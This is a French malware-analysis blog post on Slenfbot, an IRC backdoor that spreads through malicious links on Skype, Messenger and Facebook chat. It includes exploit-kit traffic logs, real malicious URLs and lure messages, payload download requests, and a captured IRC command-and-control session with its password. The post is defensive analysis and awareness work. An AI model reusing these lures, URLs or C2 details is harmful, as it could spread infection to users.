Slenfbot : Backdoor via Facebook / Microsoft/Yahoo Messenger et Skype

J’en avais déjà parlé sur un post de fin de 2010 : http://www.malekal.com/2010/12/07/slenfbot-still-an-other-irc-bot/
Cet IRC Backdoor de 2007/2008 est encore actif puisque croisé tout récemment sur un post de Commentcamarche.

 

Ci-dessous un exemple de lien malicieux envoyé par Skype :

Comme expliqué dans le billet initial, le malware va se connecter sur une URL pour récupérer les phrases à envoyer aux IM.
Une mise à jour zip du malware est aussi téléchargé :
0/43 (%) 2012-02-27 08:56:42  http://www3.malekal.com/malwares/index.php?hash=142e38a7769f2e0956bc16064371384e

On voit l’utilisation de raccourcis URL http://j.mp certainement pour Windows Live Messenger qui limite les liens WEB)

Le malware peux causer des problèmes sur Microsoft Messenger, par exemple ici, le lien est envoyé au moteur de recherche de Windows Live Messenger

Ci-dessous, la phrase et le malware est tapé sur Yahoo! Messenger :

et enfin le malware est capable d’envoyer des messages sur pas mal d’IM et sur Facebook.
De la même manière que le Nrgbot/Dorkbot, la phrase avec le lien malicieux est envoyé via le chat de Facebook.

A ne pas confondre avec les « Virus Facebook » qui eux postent sur le mur.

Comme on peux donc le constater, le malware est capable d’envoyer des liens malicieux sur pas mal d’IM et Facebook compris.

Le lien conduit à une page qui contient un exploit sur site WEB pour charger, via les vulnérabilités des logiciels non à jour, l’infection :

TCP_MISS/200 1212 GET http://t3.gstatic.com/images?q=tbn:ANd9GcQaPuGFmixEJJPmCGtAkJc-JnCzabtEqGpSzlADNwswmrglwAQBkg – DIRECT/74.125.230.80 image/jpeg
TCP_MISS/200 2498 GET http://souldivers.net/dl/stat2.js – DIRECT/208.43.60.172 application/x-javascript
TCP_MISS/200 48750 GET http://p06.hits-tracker33.in/xGen.php?SiteID=3716b798bf01eae5 – DIRECT/173.246.102.218 text/html
TCP_MISS/200 165927 GET http://p06.hits-tracker33.in/v.php?f=6d4b0&e=2 – DIRECT/173.246.102.218 application/x-msdownload
TCP_MISS/200 12324 GET http://p06.hits-tracker33.in/content/ap1.php?f=6d4b0 – DIRECT/173.246.102.218 application/pdf
TCP_MISS/200 1920 GET http://p06.hits-tracker33.in/content/field.swf – DIRECT/173.246.102.218 application/x-shockwave-flash
TCP_MISS/200 8901 GET http://p06.hits-tracker33.in/content/jav2.jar – DIRECT/173.246.102.218 application/java-archive
TCP_MISS/404 431 GET http://p06.hits-tracker33.in/com.class – DIRECT/173.246.102.218 text/html
TCP_MISS/404 431 GET http://p06.hits-tracker33.in/edu.class – DIRECT/173.246.102.218 text/html
TCP_MISS/404 431 GET http://p06.hits-tracker33.in/net.class – DIRECT/173.246.102.218 text/html
TCP_MISS/404 431 GET http://p06.hits-tracker33.in/org.class – DIRECT/173.246.102.218 text/html 

Dans tous les cas, on obtient une page « Picture has been moved » à l’effigie de Facebook.

Un zip est proposé au final :

Le but étant de se faire passer pour une image, pour cela, on utilise toujours les mêmes attaques social engineering.
Double extension .JPG.scr (les .scr sont des executables), or par défaut, les extensions sont masquées, on voit donc que le .JPG
Le fichier a l’icône d’une image, bref, difficile avec les paramètres par défaut de voir que ce n’est pas une image !

https://www.virustotal.com/file/33edf78c391ea2dc38524f65012e8ee97a01e2ee5cb838d8cd565e5140350169/analysis/1330346611/

SHA256: 33edf78c391ea2dc38524f65012e8ee97a01e2ee5cb838d8cd565e5140350169
File name: Picture28.JPG.scr
Detection ratio: 4 / 43
Analysis date: 2012-02-27 12:43:31 UTC ( 0 minute ago )

ClamAV Worm.Agent-261 20120227
DrWeb BackDoor.IRC.Bot.1449 20120227
Kaspersky Trojan.Win32.Jorik.IRCbot.hpr 20120227
NOD32 a variant of Win32/Injector.OMF 20120227

 

EDIT : et comme d’habitude les faux codecs :

Jennifer Lopez naked! http://comexus.net/vid/?######
Beyonce naked! http://comexus.net/vid/?##**##
Rachel McAdams naked! http://comexus.net/vid/?######
Selena Gomez naked! http://comexus.net/vid/?###**#
Ashley Tisdale naked! http://comexus.net/vid/?##*###
Courtney Stodden naked! http://comexus.net/vid/?#####*
Dakota Fanning naked! http://comexus.net/vid/?**####
Molly Quin naked! http://comexus.net/vid/?##**##
Lady Gaga naked! http://comexus.net/vid/?##***#
Rihana naked! http://comexus.net/vid/?#***##
Katie Perry naked! http://comexus.net/vid/?###***
Nicki Minaj naked! http://comexus.net/vid/?##***#
Tom Cruise naked! http://comexus.net/vid/?#**###
Enrique Iglesias naked! http://comexus.net/vid/?###**#
Pitbull naked! http://comexus.net/vid/?#*###*
Bruno Mars naked! http://comexus.net/vid/?#####*
Zack Effron naked! http://comexus.net/vid/?####**
Ian Harding naked! http://comexus.net/vid/?#*###*
Taylor Lauthener naked! http://comexus.net/vid/?##**##
Robert Pattinson naked! http://comexus.net/vid/?#####*
Jackson Rathebone naked! http://comexus.net/vid/?#*###*
Nick Rous naked! http://comexus.net/vid/?#*###*
Justin Bieber naked! http://comexus.net/vid/?##*###
Justin Timberlake naked! http://comexus.net/vid/?###**# 
 

 

Avast! le détecte en Win32:Kolab-VP [Trj] – en bien détecté on obtient :

Avast Win32:Kolab-VP [Trj] 20120302
BitDefender Gen:Variant.Graftor.16628 20120302
DrWeb BackDoor.IRC.Bot.1446 20120302
F-Secure Gen:Variant.Graftor.16628 20120302
Fortinet W32/Injector.MSC!tr 20120302
GData Gen:Variant.Graftor.16628 20120302
K7AntiVirus Trojan 20120301
Kaspersky Trojan.Win32.Jorik.Slenfbot.aey 20120302
NOD32 a variant of Win32/Injector.OQC 20120302
Sophos Mal/Slenfbot-E 20120302 

 

Les connexions établies :

GET /capacity HTTP/1.1..User-Agent: net_http_transaction_impl_manager/0.1..Host: vcs1.msg.yahoo.com..Cache-Control: no-cache….
GET /capacity HTTP/1.1..User-Agent: net_http_transaction_impl_manager/0.1..Host: vcs2.msg.yahoo.com..Cache-Control: no-cache….
GET /ext/0.php HTTP/1.1..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)..Host: www2.whatismyip.su..Cache-Control: no-cache….
GET /.d/20.zip HTTP/1.1..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)..Host: 82.165.44.22..Cache-Control: no-cache….
GET /.d/dy.zip HTTP/1.1..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)..Host: 82.165.44.111:84..Cache-Control: no-cache….
GET /ycontent/?&countries=f6184f13&defaultcountry=1&filter=8a880fc9&imv=57848df8&system=c281e72a&url=6cb8a234&searchbar=86178ede&sms=47315445&games=75d3790a&chatcat=0&audiblemenu=3ccb2f
GET /yab/fr?v=XM&prog=ymsgr&.intl=fr&diffs=1&t=1330343252&tags=short&rt=1330343389&prog-ver=11.5.0.192&useutf8=1&legenc=codepage-1252 HTTP/1.1..Cookie: Y=v=1&n=8mmoneu9hfbds&l=0hc0d3940
GET /vitality_proxy/V1/getEvents?max=5&alias=armandjeanplessis&grp=true&grptz=1.00&fmt=2.0&intl=fr&os=win&ver=11.5.0.192&lang=fr-FR&buddies=(kevinlancelet,loadsforsale) HTTP/1.1..Cookie
GET /client_ad.php?p=409640&fmt=2.0&intl=fr&os=win&ver=11.5.0.192&lang=fr-FR HTTP/1.1..Accept: */*..Accept-Language: fr..YMSGRCookie: Y=v=1&n=8mmoneu9hfbds&l=0hc0d3940dfb4ii8i/o&p=m23vv
GET /a/i/msgr/searchbar/sb111104.swf HTTP/1.1..User-Agent: Mozilla/4.0 (compatible; MSIE 5.5)..Host: l.yimg.com..Connection: Keep-Alive….
GET /st?ad_type=iframe&ad_size=234×60&site=167498&section_code=201943813&cb=1330687974211876&yud=yrc%3Dfr%26ycg%3Dm%26yyob%3D1970%26ybt%3D1;3;7;8;9;11;17;20;59;63;66;68;70;78;84;88;89;9
GET /b?P=uEdqfEPDuuxLLNwXS.PL8RvxU8pIzU9Qr.YAAAAB&T=17pl984ig%2fX%3d1330687974%2fE%3d97461088%2fR%3dfrpager%2fK%3d5%2fV%3d1.1%2fW%3dJR%2fY%3dFR%2fF%3d2098653899%2fH%3dc2VydmVJZD0idUVkcW
GET /imp?Z=234×60&cb=1330687974211876&S=201943813&i=167498&D=yrc%3Dfr%26ycg%3Dm%26yyob%3D1970%26ybt%3D1%3b3%3b7%3b8%3b9%3b11%3b17%3b20%3b59%3b63%3b66%3b68%3b70%3b78%3b84%3b88%3b89%3b91%
GET /atoms/f9/47/5c/bf/f9475cbfb5d7e79336f6293683d2daf0.swf?clickTAG=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGljF1vgjAUhn%2DNd6xpC5U0ZBdlFWMGuGUwozcLgkAdHwaqZPz6nSnhD%2Dykp%2
GET /.p/2pR.txt HTTP/1.1..Accept: */*..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)..Host: 82.165.40.56….
GET /.p/2wZ.txt HTTP/1.1..Accept: */*..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)..Host: 82.165.40.56….
 

EDIT – 12 sepmtebre 2012 – campagne de retour

Deux sujets sur Commentcamarche.net concernant ce malware qui était assez invisible ces derniers temps :

0 sur VirusTotal au moment de la récupération : http://www3.malekal.com/malwares/index.php?hash=ce5b12940d70334de48d514c64c6d50d


Même chose pour celui-ci : http://www3.malekal.com/malwares/index.php?hash=fc3e268b24109a61d0fa49cbba7b7c1d

SHA256: 9080cafbf215ff925333c5d90b463952d855cb8b20f7a5fb284277da8c1513b5
File name: fc3e268b24109a61d0fa49cbba7b7c1d
Detection ratio: 0 / 41
Analysis date: 2012-09-12 14:00:16 UTC ( 50 minutes ago )

https://www.virustotal.com/file/9080cafbf215ff925333c5d90b463952d855cb8b20f7a5fb284277da8c1513b5/analysis/

 

Le traffic avec l’IRCd :

###
T 192.168.1.200:1259 -> XXXX:7895
……
#
T 192.168.1.200:1259 -> XXXX:7895
PASS su1c1d3..
#
T XXXX:7895 -> 192.168.1.200:1259
:psyBNC-2.3.2-42 ..:psyBNC-2.3.2-42 ..
#
T 192.168.1.200:1259 -> XXXX:7895
NICK FRA|S-132|0|XP|943467097..USER XP-SPX FRA|S-132|0|XP|943467097 FRA|S-132|0|XP|943467097 :MEGASTORE..
###
T XXXX:7895 -> 192.168.1.200:1259
:IRC!IRC@psyBNC-2.3.2-42 PRIVMSG FRA|S-132|0|XP|943467097 :.VERSION…:psyBNC-2.3.2-42 001 FRA|S-132|0|XP|943467097 :psyBNC2.3.2-7..:psyBNC-2.3.2-42 002 FRA|S-132|0|XP|943467097 :Connec
ted. Now logging in…..:psyBNC-2.3.2-42 003 FRA|S-132|0|XP|943467097 :User Anonymous logged in…:psyBNC-2.3.2-42 004 FRA|S-132|0|XP|943467097 :Your IRC Client did not support a passwo
rd. Please type /QUOTE PASS your password to connect…:psyBNC-2.3.2-42 005 FRA|S-132|0|XP|943467097 ..:psyBNC-2.3.2-42 005 FRA|S-132|0|XP|943467097 ..:psyBNC-2.3.2-42 005 FRA|S-132|0|X
P|943467097 ….
#
T 192.168.1.200:1259 -> XXXX:7895
JOIN ##3vil n3t!..
#
T XXXX:7895 -> 192.168.1.200:1259
:FRA|S-132|0|XP|943467097!XP-SPX@XXXX JOIN :##3vil..:psyBNC-2.3.2-42 332 FRA|S-132|0|XP|943467097 ##3vil :7DAD3BD81C6A4336494373D7D5;7DAD3BD61
E331D264B4C3DDACE17EF9D872721DC89EE45124B04A08C921C459B5A7C76EBD19DCB47FD619CF9E8DB939E9AA20D26B1654412;7DB420DE02671376475D29;..:psyBNC-2.3.2-42 333 FRA|S-132|0|XP|943467097 ##3vil X 1
347451277..
#
T 192.168.1.200:1259 -> XXXX:7895
……
###
T 192.168.1.200:1260 -> 74.208.209.166:80
……
#
T 192.168.1.200:1260 -> 74.208.209.166:80
GET /ext/0.php HTTP/1.1..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)..Host: www2.whatismyip.su..Cache-Control: no-cache….
##
T 74.208.209.166:80 -> 192.168.1.200:1260
HTTP/1.0 200 OK..Date: Wed, 12 Sep 2012 13:54:09 GMT..Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6..MS-Author-Via: DAV..Content-Length: 13..Content-Type: text/html..X-Cache: M
ISS from neptune.home..X-Cache-Lookup: MISS from neptune.home:3128..Via: 1.1 neptune.home:3128 (squid/2.7.STABLE9)..Connection: close….
#
T 74.208.209.166:80 -> 192.168.1.200:1260
83.202.79.212
##
T 192.168.1.200:1260 -> 74.208.209.166:80
……
#
T 192.168.1.200:1260 -> 74.208.209.166:80
……
#
T 192.168.1.200:1260 -> 74.208.209.166:80
……
##
T 192.168.1.200:1259 -> XXXX:7895
JOIN ##opz..
###
T XXXX:7895 -> 192.168.1.200:1259
:FRA|S-132|0|XP|943467097!XP-SPX@XXXX JOIN :##opz..:psyBNC-2.3.2-42 332 FRA|S-132|0|XP|943467097 ##opz :7DBA20C00218552D4D4E7392D217EBD7922738
DA97F84504540CA09B8D1A4090546B77B1D1C2CB23DC50BEA98CAEB3BCCAD6695C9B3D0C41776B05E4;..:psyBNC-2.3.2-42 333 FRA|S-132|0|XP|943467097 ##opz X 1347452875..
###
T 192.168.1.200:1272 -> 82.165.139.204:4
……
#
T 192.168.1.200:1272 -> 82.165.139.204:4
GET /.m/k HTTP/1.1..User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)..Host: 82.165.139.204:4..Cache-Control: no-cache….
##
T 82.165.139.204:4 -> 192.168.1.200:1272
HTTP/1.1 200 OK..Server: nginx/1.2.3..Date: Wed, 12 Sep 2012 13:54:09 GMT..Content-Type: application/octet-stream..Content-Length: 167424..Last-Modified: Wed, 12 Sep 2012 11:30:46 GMT..
Connection: keep-alive..Accept-Ranges: bytes….
#
T 82.165.139.204:4 -> 192.168.1.200:1272
MZ………………….@………………………………………..!..L.!This program cannot be run in DOS mode….$…….5…q…q…q…b…p…t…e…t…7…….r…q…=…t
…y…….p…t…p…Richq………………………PE..L….oPP……………………….|S…………@……………………………d…………………………………..
..(…. ..\…………………………………………………..P6..H……………4……………………….text…………………………. ..’.data………………….
………@….rsrc…\…. ………………….@..@.reloc..:…………|…………..@..B………………………………………………………………………………..
…………………………………………………………………………………………………………………………………………………………………..
………………………………………………………………………………………H…Z…j…~…………………………………*…D…Z…p…………………
…………..2…L…b…r…………………………………….(…6…D…P…^…l…x…………………………………,…<…H…X…n…~…………………………
…..&…8…H…b…t…………………..user32.dll……zO@.~O@……….U@.+U@…………………Unknown Runtime Check Error…..A local variable was

 

Tout ça pour dire, attention sur quoi vous cliquez !

 

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 31 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *